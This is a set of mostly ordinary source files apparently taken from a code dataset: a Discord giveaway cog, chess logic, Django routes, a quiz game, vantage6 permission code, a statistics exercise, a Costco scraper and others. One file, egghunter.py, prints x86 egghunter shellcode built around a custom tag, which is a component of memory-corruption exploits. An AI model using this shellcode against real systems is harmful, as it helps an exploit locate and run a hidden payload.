print(\"Creating empty giveaway.json...\")\n        fileIO(f, \"save\", [])\n\n\ndef setup(bot):\n    global logger\n    check_folders()\n    check_files()\n    logger = logging.getLogger(\"giveaway\")\n    if logger.level == 0:  # Prevents the logger from being loaded again in case of module reload\n        logger.setLevel(logging.INFO)\n        handler = logging.FileHandler(\n            filename='data/MotorSport/giveaway/giveaway.log', encoding='utf-8', mode='a')\n        handler.setFormatter(logging.Formatter(\n            '%(asctime)s %(message)s', datefmt=\"[%d/%m/%Y %H:%M]\"))\n        logger.addHandler(handler)\n    n = MOTORSPORT_GIVEAWAY(bot)\n    loop = asyncio.get_event_loop()\n    loop.create_task(n.check_giveaway())\n    bot.add_cog(n)\n","sub_path":"MotorSport-Giveaway/MotorSport-Giveaway.py","file_name":"MotorSport-Giveaway.py","file_ext":"py","file_size_in_byte":8143,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"572361543","text":"import numpy as np\n\nEMPTY = 0\n\nINVERSE = -1\n\nBLACK = -1\nWHITE = 1\n\nPAWN = 1\nROOK = 2\nKNIGHT = 3\nBISHOP = 4\nQUEEN = 5\nKING = 6\n\n\nclass Board:\n    def __init__(self):\n        self.__board = np.array([[2, 3, 4, 5, 6, 4, 3, 2],\n                                 [1, 1, 1, 1, 1, 1, 1, 1],\n                                 [0, 0, 0, 0, 0, 0, 0, 0],\n                                 [0, 0, 0, 0, 0, 0, 0, 0],\n                                 [0, 0, 0, 0, 0, 0, 0, 0],\n                                 [0, 0, 0, 0, 0, 0, 0, 0],\n                                 [-1, -1, -1, -1, -1, -1, -1, -1],\n                                 [-2, -3, -4, -5, -6, -4, -3, -2]])\n        self.__movedRooks = np.array([0, 0, 0, 0])  # wRook1,wRook2, bRook1, bRook2\n        self.__movedKings = np.array([0, 0])\n\n    def print(self):\n        for i in range(0, 8, 1):\n            for j in range(0, 8, 1):\n                print(\"%3d\" % (self.__board[7 - i][j]), end='')\n\n            print()\n        print()\n\n    def update(self, a1, a2, b1, b2):\n        if a1 < 0 or a1 > 7 or a2 < 0 or a2 > 7 or b1 < 0 or b1 > 7 or b2 < 0 or b2 > 7:\n            return False\n\n        self.__board[b1][b2] = self.__board[a1][a2]\n        self.__board[a1][a2] = 0\n\n        return True\n\n    # returns array of [[a1,a2,b1,b2],[a1,....],[...],]\n    def get_possible_moves(self, color):\n        pm = []\n        if color != BLACK and color != WHITE:\n            raise ValueError(\"Color specified as \" + str(color))\n        for i in range(0,8,1):\n            for j in range(0,8,1):\n                piece = self.__board[i][j]\n                if color == BLACK and piece >= BLACK * KING and piece <= BLACK * PAWN \\\n                or color == WHITE and piece >= WHITE * PAWN and piece <= WHITE * KING :\n                    if piece == color * PAWN:\n                        
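# color is +1 for white and -1 for black, so it doubles as the pawn's direction of travel\n                        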
if(self.__board[i + color][j] == EMPTY):\n                            pm.append(np.array([i,j,i + color,j]))\n        # only single pawn advances are generated so far; the other pieces are still to do\n        return pm\n\n\n\nclass Game:\n    def __init__(self):\n        self.board = Board()\n        self.round = 0\n        self.atTurn = BLACK\n\n\nboard = Board()\nboard.print()\n\nprint(board.get_possible_moves(BLACK))","sub_path":"src/chess/old (-2018-02-13)/dev.py","file_name":"dev.py","file_ext":"py","file_size_in_byte":2119,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"371404604","text":"from __future__ import print_function\nfrom sys import argv, exit\nfrom textwrap import wrap\n\neggs = []\n\ndef convert(tag):\n    for char in tag:\n        eggs.append('\\\\x{:02x}'.format(ord(char)))\n\ndef eggFormat():\n    egg = '\\\\x66\\\\x81\\\\xca\\\\xff\\\\x0f\\\\x42\\\\x52\\\\x6a\\\\x02\\\\x58\\\\xcd\\\\x2e\\\\x3c\\\\x05\\\\x5a\\\\x74\\\\xef\\\\xb8'\n    egg += '{}'.format(''.join(eggs))\n    egg += '\\\\x8b\\\\xfa\\\\xaf\\\\x75\\\\xea\\\\xaf\\\\x75\\\\xe7\\\\xff\\\\xe7'\n    return wrap(egg, 52)\n\ndef main():\n    convert(tag)\n    print('[+] Your {} egghunter is below:\\n'.format(tag))\n    print('egghunter = \\'\\'')\n    for egg in eggFormat():\n        print('egghunter += \\'{}\\''.format(egg))\n\nif __name__ == '__main__':\n    print('[+] Makes getting your own tags for the egghunter easier.')\n    try:\n        tag = argv[1]\n    except IndexError:\n        print('[!] Usage: {} [ 4 byte tag e.g. W00T ]'.format(argv[0]))\n        exit()\n    if len(tag) != 4:\n        print('[!] The tag must be exactly 4 characters, e.g. W00T')\n    else:\n        main()\n","sub_path":"egghunter.py","file_name":"egghunter.py","file_ext":"py","file_size_in_byte":955,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"573757582","text":"from django.urls import path\n\nfrom . import views\n\napp_name = \"users\"\nurlpatterns = [\n    path(\"~redirect/\",\n         view=views.UserRedirectView.as_view(),\n         name=\"redirect\"\n         ),\n    path(\"~update/\",\n         view=views.UserUpdateView.as_view(),\n         name=\"update\"\n         ),\n    path(\n        \"\",\n        view=views.UserDetailView.as_view(),\n        name=\"detail\",\n    ),\n    path(\"questions/\",\n         view=views.question_list,\n         name=\"questions\"\n         ),\n    path(\"questions//\",\n         view=views.update_answer\n         ),\n]\n","sub_path":"university_dost/users/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":587,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"184038622","text":"import random\n\n\ndef intcheck(question, low, high):\n    valid = False\n    while not valid:\n        try:\n            response = int(input(question))\n            if low <= response <= high:\n                print(\"Well done\")\n                return response\n\n            elif response < lowest or response > highest:\n                # remind the player that answers stay inside the global 0-1000 range\n                print(\"The answer is between 0 and 1000\")\n\n            else:\n                print(\"WRONG!!\")\n                print()\n        except ValueError:\n            print(\"Please enter an integer\")\n            print()\n\n\nlowest = 0\nhighest = 1000\n\nplay_again = \"\"\nwhile play_again == \"\":\n\n    num = random.randint(lowest, highest)\n    num1 = random.randint(lowest, highest)\n\n    math = num + num1\n\n    # rounds = intcheck(\"How many rounds?\", 1, 10) #\n    round1 = intcheck(\"{} + {}\".format(num, num1), math, math)\n\n    play_again = (input(\"Push \"))\n\nprint(\"Thank You For Playing\")","sub_path":"sandpit.py","file_name":"sandpit.py","file_ext":"py","file_size_in_byte":892,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"92356845","text":"import logging\nimport importlib\n\nfrom collections import namedtuple\nfrom flask_principal import Permission, PermissionDenied\n\nfrom vantage6.server.globals import RESOURCES\nfrom 
vantage6.server.default_roles import DefaultRole\nfrom vantage6.server.model.role import Role\nfrom vantage6.server.model.rule import Rule, Operation, Scope\nfrom vantage6.server.model.base import DatabaseSessionManager\nfrom vantage6.common import logger_name\n\nmodule_name = logger_name(__name__)\nlog = logging.getLogger(module_name)\n\nRuleNeed = namedtuple(\"RuleNeed\", [\"name\", \"scope\", \"operation\"])\n\n\nclass RuleCollection:\n \"\"\"\n Class that tracks a set of all rules for a certain resource name\n\n Parameters\n ----------\n name: str\n Name of the resource endpoint (e.g. node, organization, user)\n \"\"\"\n\n def __init__(self, name: str) -> None:\n self.name = name\n\n def add(self, scope: Scope, operation: Operation) -> None:\n \"\"\"\n Add a rule to the rule collection\n\n Parameters\n ----------\n scope: Scope\n Scope within which to apply the rule\n operation: Operation\n What operation the rule applies to\n \"\"\"\n permission = Permission(RuleNeed(self.name, scope, operation))\n self.__setattr__(f'{operation.value}_{scope.value}', permission)\n\n\nclass PermissionManager:\n \"\"\"\n Loads the permissions and syncs rules in database with rules defined in\n the code\n \"\"\"\n\n def __init__(self) -> None:\n self.collections = {}\n log.info(\"Loading permission system...\")\n self.load_rules_from_resources()\n\n def load_rules_from_resources(self) -> None:\n \"\"\"\n Collect all permission rules from all registered API resources\n \"\"\"\n for res in RESOURCES:\n module = importlib.import_module('vantage6.server.resource.' + res)\n try:\n module.permissions(self)\n except Exception:\n module_name = module.__name__.split(\".\")[-1]\n log.debug(f\"Resource '{module_name}' contains no or invalid \"\n \"permissions\")\n\n def assign_rule_to_root(self, name: str, scope: Scope,\n operation: Operation) -> None:\n \"\"\"\n Assign a rule to the root role.\n\n resource: str\n Resource that the rule applies to\n scope: Scope\n Scope that the rule applies to\n operation: Operation\n Operation that the rule applies to\n \"\"\"\n self.assign_rule_to_fixed_role(DefaultRole.ROOT, name, scope,\n operation)\n\n def assign_rule_to_node(self, resource: str, scope: Scope,\n operation: Operation) -> None:\n \"\"\"\n Assign a rule to the Node role.\n\n Parameters\n ----------\n resource: str\n Resource that the rule applies to\n scope: Scope\n Scope that the rule applies to\n operation: Operation\n Operation that the rule applies to\n \"\"\"\n self.assign_rule_to_fixed_role(DefaultRole.NODE, resource, scope,\n operation)\n\n def assign_rule_to_container(self, resource: str, scope: Scope,\n operation: Operation) -> None:\n \"\"\"\n Assign a rule to the container role.\n\n Parameters\n ----------\n resource: str\n Resource that the rule applies to\n scope: Scope\n Scope that the rule applies to\n operation: Operation\n Operation that the rule applies to\n \"\"\"\n self.assign_rule_to_fixed_role(DefaultRole.CONTAINER, resource, scope,\n operation)\n\n @staticmethod\n def assign_rule_to_fixed_role(fixedrole: str, resource: str, scope: Scope,\n operation: Operation) -> None:\n \"\"\"\n Attach a rule to a fixed role (not adjustable by users).\n\n Parameters\n ----------\n fixedrole: str\n Name of the fixed role that the rule should be added to\n resource: str\n Resource that the rule applies to\n scope: Scope\n Scope that the rule applies to\n operation: Operation\n Operation that the rule applies to\n \"\"\"\n role = Role.get_by_name(fixedrole)\n if not role:\n log.warning(f\"{fixedrole} role 
not found, creating it now!\")\n            role = Role(name=fixedrole, description=f\"{fixedrole} role\")\n\n        rule = Rule.get_by_(resource, scope, operation)\n        if not rule:\n            log.error(f\"Rule ({resource},{scope},{operation}) not found!\")\n            return\n\n        if rule not in role.rules:\n            role.rules.append(rule)\n            log.info(f\"Rule ({resource},{scope},{operation}) added to \"\n                     f\"{fixedrole} role!\")\n\n    def register_rule(self, resource: str, scope: Scope,\n                      operation: Operation, description=None,\n                      assign_to_node=False, assign_to_container=False) -> None:\n        \"\"\"\n        Register a permission rule in the database.\n\n        If a rule already exists, nothing is done. This rule can be used in API\n        endpoints to determine if a user, node or container can do a certain\n        operation in a certain scope.\n\n        Parameters\n        ----------\n        resource : str\n            API resource that the rule applies to\n        scope : Scope\n            Scope of the rule\n        operation : Operation\n            Operation of the rule\n        description : String, optional\n            Human-readable description of what the rule is used for, by default\n            None\n        assign_to_node: bool, optional\n            Whether rule should be assigned to the node role or not. Default\n            False\n        assign_to_container: bool, optional\n            Whether rule should be assigned to the container role or not.\n            Default False\n        \"\"\"\n        # verify that the rule is in the DB, so that these can be assigned to\n        # roles and users\n        rule = Rule.get_by_(resource, scope, operation)\n        if not rule:\n            rule = Rule(name=resource, operation=operation, scope=scope,\n                        description=description)\n            rule.save()\n            log.debug(f\"New auth rule '{resource}' with scope={scope}\"\n                      f\" and operation={operation} is stored in the DB\")\n\n        if assign_to_container:\n            self.assign_rule_to_container(resource, scope, operation)\n\n        if assign_to_node:\n            self.assign_rule_to_node(resource, scope, operation)\n\n        # assign all new rules to root user\n        self.assign_rule_to_root(resource, scope, operation)\n\n        self.collection(resource).add(rule.scope, rule.operation)\n\n    def appender(self, name: str) -> callable:\n        \"\"\"\n        Add a module's rules to the rule collection\n\n        Parameters\n        ----------\n        name: str\n            The name of the module whose rules are to be registered\n\n        Returns\n        -------\n        Callable\n            A callable ``register_rule`` function\n        \"\"\"\n        # make sure collection exists\n        self.collection(name)\n        return lambda *args, **kwargs: self.register_rule(name, *args,\n                                                          **kwargs)\n\n    def collection(self, name: str) -> RuleCollection:\n        \"\"\"\n        Get a RuleCollection object. If it doesn't exist yet, it will be\n        created.\n\n        Parameters\n        ----------\n        name: str\n            Name of the module whose RuleCollection is to be obtained or\n            created\n\n        Returns\n        -------\n        RuleCollection\n            The collection of rules belonging to the module name\n        \"\"\"\n        if self._collection_exists(name):\n            return self.collections[name]\n        else:\n            self.collections[name] = RuleCollection(name)\n            return self.collections[name]\n\n    def _collection_exists(self, name: str) -> bool:\n        \"\"\"\n        Check if a module's rule collection is defined\n\n        Parameters\n        ----------\n        name: str\n            Name of the module to be checked\n\n        Returns\n        -------\n        bool:\n            True if RuleCollection is defined for module, else False\n        \"\"\"\n        return name in self.collections\n
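\n    # A sketch of how a resource module typically registers its rules through\n    # appender(); the module name \"node\" and the Scope/Operation members used\n    # here are assumptions for illustration, not taken from this file:\n    #\n    #   def permissions(permissions: PermissionManager):\n    #       add = permissions.appender(\"node\")\n    #       add(scope=Scope.GLOBAL, operation=Operation.VIEW,\n    #           description=\"view any node\")\n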
\n    def __getattr__(self, name: str) -> RuleCollection:\n        # TODO BvB 2023-01-18 I think this function might not be used. It would\n        # be triggered when we do something like\n        # `permissionManager.resource_name` but we don't ever do that (?!)\n        try:\n            collection = self.collections[name]\n            return collection\n        except Exception as e:\n            log.critical(f\"Missing permission collection! {name}\")\n            raise e\n\n    @staticmethod\n    def rule_exists_in_db(name: str, scope: Scope,\n                          operation: Operation) -> bool:\n        \"\"\"Check if the rule exists in the DB.\n\n        Parameters\n        ----------\n        name: str\n            Name of the rule\n        scope: Scope\n            Scope of the rule\n        operation: Operation\n            Operation of the rule\n\n        Returns\n        -------\n        bool\n            Whether this rule exists in the database or not\n        \"\"\"\n        session = DatabaseSessionManager.get_session()\n        result = session.query(Rule).filter_by(\n            name=name,\n            operation=operation,\n            scope=scope\n        ).scalar()\n        session.commit()\n        return result\n\n    @staticmethod\n    def check_user_rules(rules: list[Rule]) -> dict | None:\n        \"\"\"\n        Check if a user, node or container has all the `rules` in a list\n\n        Parameters\n        ----------\n        rules: List[Rule]\n            List of rules that user is checked to have\n\n        Returns\n        -------\n        dict | None\n            Dict with a message which rule is missing, else None\n        \"\"\"\n        for rule in rules:\n            requires = RuleNeed(rule.name, rule.scope, rule.operation)\n            try:\n                Permission(requires).test()\n            except PermissionDenied:\n                return {\"msg\": f\"You don't have the rule ({rule.name}, \"\n                        f\"{rule.scope}, {rule.operation})\"}\n        return None\n","sub_path":"vantage6-server/vantage6/server/permission.py","file_name":"permission.py","file_ext":"py","file_size_in_byte":10436,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"365102370","text":"from functions import lamda_exponential_estimate, d_sample_exponential\nfrom functions import p_value_exponential, reject, p_value\n\n\nif __name__ == '__main__':\n    \"\"\"\n    Problem statement: In a vibration study, a random sample of 15 aircraft\n    components was subjected to strong vibrations until structural failures\n    became apparent. The data given are the minutes elapsed until those\n    failures appeared: 1.6 10.3 3.5 13.5 18.4 7.7 24.3 10.7 8.4 4.9 7.9 12\n    16.2 6.8 14.7.\n    Test the null hypothesis that these observations can be considered a\n    sample from an exponential population.\n    \"\"\"\n    
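# Two p-values are computed below: p_value_exponential re-estimates lamda on\n    # every simulated sample, while p_value keeps the parameters fixed; the two\n    # printed results are compared at the end.\n    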
H0 = \"H0: The following data come from an exponential distribution\"\n    text = \"P-value with Kolmogorov-Smirnov:\"\n\n    sample = [1.6, 10.3, 3.5, 13.5, 18.4, 7.7, 24.3, 10.7, 8.4, 4.9, 7.9, 12,\n              16.2, 6.8, 14.7]\n    sample.sort()\n\n    n, Iter = len(sample), 10000\n    lamda = lamda_exponential_estimate(sample)\n    d = d_sample_exponential(sample, lamda)\n    p_value_1 = p_value_exponential(n, lamda, d, Iter)\n    p_value_2 = p_value(n, Iter, d)\n\n    print(\"Statistic: {}\".format(d))\n    print(\"===============================\")\n    print(\"{}\\n{}\".format(H0, text))\n    print(\"Estimating parameters in every iteration: {}\".format(p_value_1))\n    reject(p_value_1)\n    print(\"===============================\")\n    print(\"Without estimating parameters: {}\".format(p_value_2))\n    reject(p_value_2)\n","sub_path":"ModelosySimulacion/modysim-master/practical7/exerc7.py","file_name":"exerc7.py","file_ext":"py","file_size_in_byte":1489,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"87071350","text":"from src.vision.presentation.repositories.depthImagePointsRepository import depthImagePointsRepository\n\n\nclass Transform3DPointsToDepthFileService:\n    def __init__(self):\n        self.depthImageRepository = depthImagePointsRepository()\n\n    def execute(self, points_3d, points_a_2d, calibration_data, image):\n        self.depthImageRepository.saveInPathWithImage(\n            'bin/second_test.txt',\n            points_3d,\n            points_a_2d,\n            (image.shape[0], image.shape[1])\n        )\n\n        self.depthImageRepository.readFromPath('bin/second_test.txt')\n","sub_path":"code/src/vision/presentation/services/Transform3DPointsToDepthFileService.py","file_name":"Transform3DPointsToDepthFileService.py","file_ext":"py","file_size_in_byte":574,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"337593556","text":"from room import Room\nfrom player import Player\nfrom item import Gold\nfrom item import Food\n\n# Declare all the rooms\nroom = {\n    'outside': Room(\"Outside Cave Entrance\",\n                    \"North of you, the cave mount beckons\"),\n\n    'foyer': Room(\"Foyer\", \"\"\"Dim light filters in from the south. Dusty\npassages run north and east.\"\"\", [Food('banana', 'is a bit bruised', 20), Gold(100)]),\n\n    'overlook': Room(\"Grand Overlook\", \"\"\"A steep cliff appears before you, falling\ninto the darkness. Ahead to the north, a light flickers in\nthe distance, but there is no way across the chasm.\"\"\"),\n\n    'narrow': Room(\"Narrow Passage\", \"\"\"The narrow passage bends here from west\nto north. The smell of gold permeates the air.\"\"\"),\n\n    'treasure': Room(\"Treasure Chamber\", \"\"\"You've found the long-lost treasure\nchamber! Sadly, it has already been completely emptied by\nearlier adventurers. 
The only exit is to the south.\"\"\"),\n}\n\n\n# Link rooms together\nroom['outside'].north_to = room['foyer']\nroom['outside'].n_to = room['foyer']\nroom['foyer'].south_to = room['outside']\nroom['foyer'].s_to = room['outside']\nroom['foyer'].north_to = room['overlook']\nroom['foyer'].n_to = room['overlook']\nroom['foyer'].east_to = room['narrow']\nroom['foyer'].e_to = room['narrow']\nroom['overlook'].south_to = room['foyer']\nroom['overlook'].s_to = room['foyer']\nroom['narrow'].west_to = room['foyer']\nroom['narrow'].w_to = room['foyer']\nroom['narrow'].north_to = room['treasure']\nroom['narrow'].n_to = room['treasure']\nroom['treasure'].south_to = room['narrow']\nroom['treasure'].s_to = room['narrow']\n\n#\n# Main\n#\n\n\ndef tryDirection(d, curRoom):\n\n attrib = d + '_to'\n\n # curRoom.s_to\n # hasattr(currRoom, 's_to) will return true\n if hasattr(curRoom, attrib):\n return getattr(curRoom, attrib)\n else:\n print(\"You cant go that way\")\n\n return curRoom\n\n\n# Make a new player object that is currently in the 'outside' room.\nplayer = Player(room['outside'])\n# Write a loop that:\n#\n# * Prints the current room name\n# * Prints the current description (the textwrap module might be useful here).\n# * Waits for user input and decides what to do.\n#\n# If the user enters a cardinal direction, attempt to move to the room there.\n# Print an error message if the movement isn't allowed.\n#\n# If the user enters \"q\", quit the game.\n\ndone = False\n\nwhile not done:\n print('\\nWelcome to my adventure game! In this game you will choose which direction you want to go from room to room. In the terminal please type either n or north, s or south, w or west, or e or east. To exit type q or quit. Thank you!')\n print(f'\\n{player.curRoom.name}\\n')\n print(f'{player.curRoom.description}')\n\n # print room items\n for item in player.curRoom.items:\n print(item)\n print(item.inspect())\n\n user_input = input(\"\\nType direction to go: \").strip().lower().split()\n\n if len(user_input) != 1:\n print('I dont understand that. 
Type n,s,w, or e')\n continue\n\n if user_input[0] == 'quit' or user_input[0] == 'q':\n done = True\n\n elif user_input[0] in [\"n\", \"north\", \"s\", \"south\", \"w\", \"west\", \"e\", \"east\"]:\n player.curRoom = tryDirection(user_input[0], player.curRoom)\n\n else:\n unknown_input = user_input[0]\n print('Unknown command: ', unknown_input)\n","sub_path":"src/adv.py","file_name":"adv.py","file_ext":"py","file_size_in_byte":3307,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"584421828","text":"'''\nEncapsulates all tasks that can be run against the 'webhooks' endpoint\n'''\ndef _check_url_length(url, api):\n ''' Checks the given url against the given API specifications to ensure it's short enough '''\n if len(url) > api.MAX_WEBHOOK_URL_LENGTH:\n raise ValueError(\"Url cannot be longer than {} characters\".format(api.MAX_WEBHOOK_URL_LENGTH))\n\ndef get_webhooks(client, list_id):\n ''' Gets all webhooks for the given list ID '''\n params = { \n 'list_id' : str(list_id)\n }\n response = client.authenticated_request(client.api.Endpoints.WEBHOOKS, params=params)\n return response.json()\n\ndef create_webhook(client, list_id, url, processor_type, configuration=\"\"):\n ''' \n Creates a webhook in the given list\n\n See https://developer.wunderlist.com/documentation/endpoints/webhooks for detailed parameter information\n '''\n _check_url_length(url, client.api)\n data = {\n 'list_id' : int(list_id) if list_id else None,\n 'url' : url,\n 'processor_type' : processor_type,\n 'configuration' : configuration\n }\n data = { key: value for key, value in data.iteritems() if value is not None }\n response = client.authenticated_request(client.api.Endpoints.WEBHOOKS, 'POST', data=data)\n return response.json()\n\ndef delete_webhook(client, webhook_id, revision):\n params = {\n 'revision' : int(revision),\n }\n endpoint = '/'.join([client.api.Endpoints.WEBHOOKS, str(webhook_id)])\n client.authenticated_request(endpoint, 'DELETE', params=params)\n","sub_path":"wunderpy2/webhooks_endpoint.py","file_name":"webhooks_endpoint.py","file_ext":"py","file_size_in_byte":1581,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"141415926","text":"class Solution:\n # @param A : string\n # @return an integer\n def lengthOfLastWord(self, A):\n A = A.split(' ')\n A = A[::-1]\n for i in A:\n if i.isalpha():\n return len(i)\n return 0\n\n\nrr = Solution()\nr = rr.lengthOfLastWord('Hello World')\nprint(r)\n","sub_path":"Strings/length-of-last-word.py","file_name":"length-of-last-word.py","file_ext":"py","file_size_in_byte":306,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"388265410","text":"import time\nimport multiprocessing\n\n\ndef worker(data):\n [calc(x) for x in data]\n\n\ndef calc(x):\n a = x * 2\n print(a)\n #time.sleep(2)\n\nif __name__ == '__main__':\n split_data = [[1, 2, 3], [4, 5]]\n\n jobs = []\n for data in split_data:\n job = multiprocessing.Process(target=worker, args=(data, ))\n jobs.append(job)\n job.start()\n\n [job.join() for job in jobs]\n\n print('Finish')\n","sub_path":"japan_stock_analysis/python_stock/multiprocess_test.py","file_name":"multiprocess_test.py","file_ext":"py","file_size_in_byte":420,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"554678840","text":"import json\n\nimport torch\nfrom torchvision.utils import make_grid\nimport matplotlib.pyplot as plt\n\nfrom 
datasets import get_CIFAR10, get_SVHN, postprocess\nfrom model import Glow\n\nimport glob\nimport train\n\ndevice = torch.device(\"cpu\")\n\noutput_folder = 'output/'\nlatest_model_path = glob.glob(\"output/glow_model_*.pth\")[-1]\n\nwith open(output_folder + 'hparams.json') as json_file: \n hparams = json.load(json_file)\n\ntest_mnist = train.MyMNIST(train=False, download=False)\nimage_shape = (32, 32, 1)\nnum_classes = 10\nbatch_size = 512\n\nmodel = Glow(image_shape, hparams['hidden_channels'], hparams['K'], hparams['L'], hparams['actnorm_scale'],\n hparams['flow_permutation'], hparams['flow_coupling'], hparams['LU_decomposed'], num_classes,\n hparams['learn_top'], hparams['y_condition'])\n\nmodel.load_state_dict(torch.load(latest_model_path))\nmodel.set_actnorm_init()\n\nmodel = model.to(device)\n\nmodel = model.eval()\n\ndef sample(model):\n with torch.no_grad():\n if hparams['y_condition']:\n y = torch.eye(num_classes)\n y = y.repeat(batch_size // num_classes + 1)\n y = y[:32, :].to(device) # number hardcoded in model for now\n else:\n y = None\n\n images = postprocess(model(y_onehot=y, temperature=1, reverse=True))\n\n return images.cpu()\n\nimages = sample(model)\ngrid = make_grid(images[:30], nrow=6).permute(1,2,0)\n\nplt.figure(figsize=(10,10))\nplt.imshow(grid)\nplt.axis('off')\nplt.savefig('output.png')\n\n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1488,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"593980649","text":"import config\n\nimport BStockImages.util.db.dbmongo as dbm\nfrom BStockImages.util.images import *\n\nimport requests as rq\nimport re \nfrom random import shuffle\n\nfrom html.parser import HTMLParser\n\nfrom pprint import *\n\nimport json\nimport os\n\nimport PIL as pil\nimport PIL.Image as image\n\n_CLOTHING_REGEX = re.compile('var products = (\\[.*?\\]);\\r', re.DOTALL)\n\nclass CostcoParser(HTMLParser):\n def __init__(self):\n super().__init__()\n self.found = False\n self.itemnum = -1\n self.description = \"\"\n self.pictureurl = \"\"\n\n def handle_data(self, data):\n if self.description == '-1':\n self.description = data\n\n def handle_starttag(self, tag, attrs):\n if tag == 'h1' and ('itemprop', 'name') in attrs:\n self.description = '-1'\n \n if self.found:\n return \n \n if tag == 'span' and self.itemnum == -1:\n for k,v in attrs:\n if 'data-sku' == k:\n print('Sku')\n self.itemnum = int(v)\n if self.pictureurl != \"\":\n self.found = True\n break\n if tag == 'img' and self.pictureurl == \"\":\n if ('id', 'initialProductImage') in attrs:\n for k, v in attrs:\n if k == 'src':\n self.pictureurl = v\n if self.itemnum != -1:\n self.found = True\n break\n\n\ndef _testClothing(request):\n result = _CLOTHING_REGEX.search(request.text)\n\n if result == None:\n return None\n\n jsn = json.loads(result.group(1))\n\n retv = []\n for item in jsn[0]:\n try:\n itemnumber = item['partNumber']\n description = item['productName']\n url = item['parent_img_url']\n\n retv.append((itemnumber, description, url))\n except KeyError as e:\n print(\"Error --- \", jsn)\n return retv\n \ndef searchCostco(itemnum):\n URL = 'https://www.costco.com/.product.html?dept=All&catalogId=0&keyword=%s'\n HEADER = { 'User-Agent' : 'Mozilla/5.0' }\n\n parse = CostcoParser()\n\n retv = None\n with rq.get(URL % itemnum, headers=HEADER) as req:\n if req.status_code == 200:\n parse.feed(req.text)\n if parse.found:\n retv = [(itemnum, parse.description, parse.pictureurl)]\n else:\n retv = 
_testClothing(req)\n return retv\n\nif __name__ == '__main__':\n # Setup DB\n client = dbm.getClient()\n db = client.Items\n col = db.costco\n\n #searchCostco(1168584)\n\n items = list(col.find({\n 'searched': True, \n 'found': False, \n 'reasons.website' : {\n '$exists' : False\n }\n }))\n shuffle(items)\n\n path = os.path.join(os.getenv('home'), 'Images')\n os.chdir(path)\n\n for i in range(10000):\n srcitm = items[i]\n print('Searching (%d) %d - ' % (i, srcitm['item-num']), end = '', flush=True)\n results = searchCostco(srcitm['item-num'])\n \n if results == None:\n continue\n multi = 0\n\n img = None\n for itn, des, url in results:\n print(itn, des, url, flush=True)\n dbitem = col.find_one({'item-num' : itn})\n if dbitem != None and dbitem['found']:\n continue\n\n if multi == 0:\n img = download_image(url)\n if img == None:\n print('Image does not exist', itn)\n break\n img.save(str(itn) + '.jpg')\n multi += 1\n else:\n img.save(str(itn) + '.jpg') \n \n reason = {\n 'success' : True,\n 'website' : True,\n 'description' : des,\n 'imglink' : url\n }\n if dbitem != None and dbitem['found'] != True:\n query = {'$set' : { 'found': True, \n 'searched' : True,\n 'image-name' : str(itn) + '.jpg',\n 'reasons' : reason }}\n col.update({'_id' : dbitem['_id']}, query)\n else:\n ins = {\n 'item-num' : itn,\n 'searched' : True,\n 'found' : True,\n 'description' : des,\n 'image-name' : str(itn) + '.jpg',\n 'reasons' : reason\n }\n col.insert(ins)\n","sub_path":"Costco/costcosearch.py","file_name":"costcosearch.py","file_ext":"py","file_size_in_byte":4605,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"124937837","text":"#Classes\n\n#A class is code that specifies the data attributes and methods for a particular type of object\nimport random\n#The coin Coin class simulates a coin that can be flipped\n\nclass Coin:\n #the __init__ method is present in every class and initializes the sideup data attribute with heads\n def __init__(self):\n self.__sideup = 'Heads'\n\n # The toss method generateds a random number\n # in the range 0-1. If the number\n # is 0, then sideup is set to heads, \n # otherwise, sideup is set to tails\n def toss(self):\n if random.randint(0, 1) == 0:\n self.__sideup = 'Heads'\n else:\n self.__sideup = 'Tails'\n\n # The get_sideup method returns the value\n # referenced by sideup\n def get_sideup(self):\n return self.__sideup \n\n# main function to operate with this class\ndef main():\n #Create an object from the coin class\n my_coin = Coin()\n type(my_coin)\n\n # sideup attribute is not private\n my_coin.__sideup = 'Tails'\n #If we don't want the user to set that variable \n # it needs to be private. Prepend the variable with __\n # It will not error, but it prevents the assignment\n\n #Display the side of the coin that is facing up\n print('This side is up: ', my_coin.get_sideup())\n\n #Toss the coin\n print('I am tossing the coin ....')\n for count in range(10):\n my_coin.toss()\n print(my_coin.get_sideup())\n\n\n #Display the side of the coin that is facing up\n print('This side is up: ', my_coin.get_sideup())\n\n\n#main()\n####\n#More Lecture notes","sub_path":"LABS/Classes/coin.py","file_name":"coin.py","file_ext":"py","file_size_in_byte":1564,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"338468571","text":"#! 
